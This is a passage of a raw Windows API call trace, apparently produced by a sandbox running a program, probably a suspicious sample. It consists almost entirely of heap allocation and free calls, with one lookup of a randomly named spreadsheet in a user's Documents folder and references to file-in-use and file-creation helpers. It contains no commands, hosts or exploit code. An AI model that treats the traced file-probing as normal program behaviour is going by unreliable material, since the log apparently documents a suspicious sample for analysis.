(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0077.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0077.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0077.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0077.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0077.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0077.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0077.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0077.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9920 [0077.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0077.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0077.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0077.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0077.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0077.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0077.356] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0077.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0077.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.356] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0077.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0077.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0077.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0077.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0077.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.357] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\NwJd3dflnaF4DbF3Yn.xlsx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf41dd590, ftCreationTime.dwHighDateTime=0x1d5d3cd, ftLastAccessTime.dwLowDateTime=0x5e6efc80, ftLastAccessTime.dwHighDateTime=0x1d59611, ftLastWriteTime.dwLowDateTime=0x5e6efc80, ftLastWriteTime.dwHighDateTime=0x1d59611, nFileSizeHigh=0x0, nFileSizeLow=0x13946, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="NwJd3dflnaF4DbF3Yn.xlsx", cAlternateFileName="NWJD3D~1.XLS")) returned 0x41ac2c0 [0077.357] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0077.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0077.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0077.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0077.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0077.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0077.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.357] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0077.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0077.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0077.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0077.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0077.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0077.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0077.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0077.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0077.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ba8 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0077.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.358] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0077.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0077.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.398] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0077.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0077.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0077.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0077.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0077.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0077.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0077.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0077.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e30 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0077.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0077.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0077.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0077.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0077.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0077.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0077.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0077.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0077.401] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0077.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0077.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0077.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0077.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0077.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0077.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0077.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0077.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0077.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0077.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.404] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0077.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0077.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0077.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0077.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0077.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0077.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 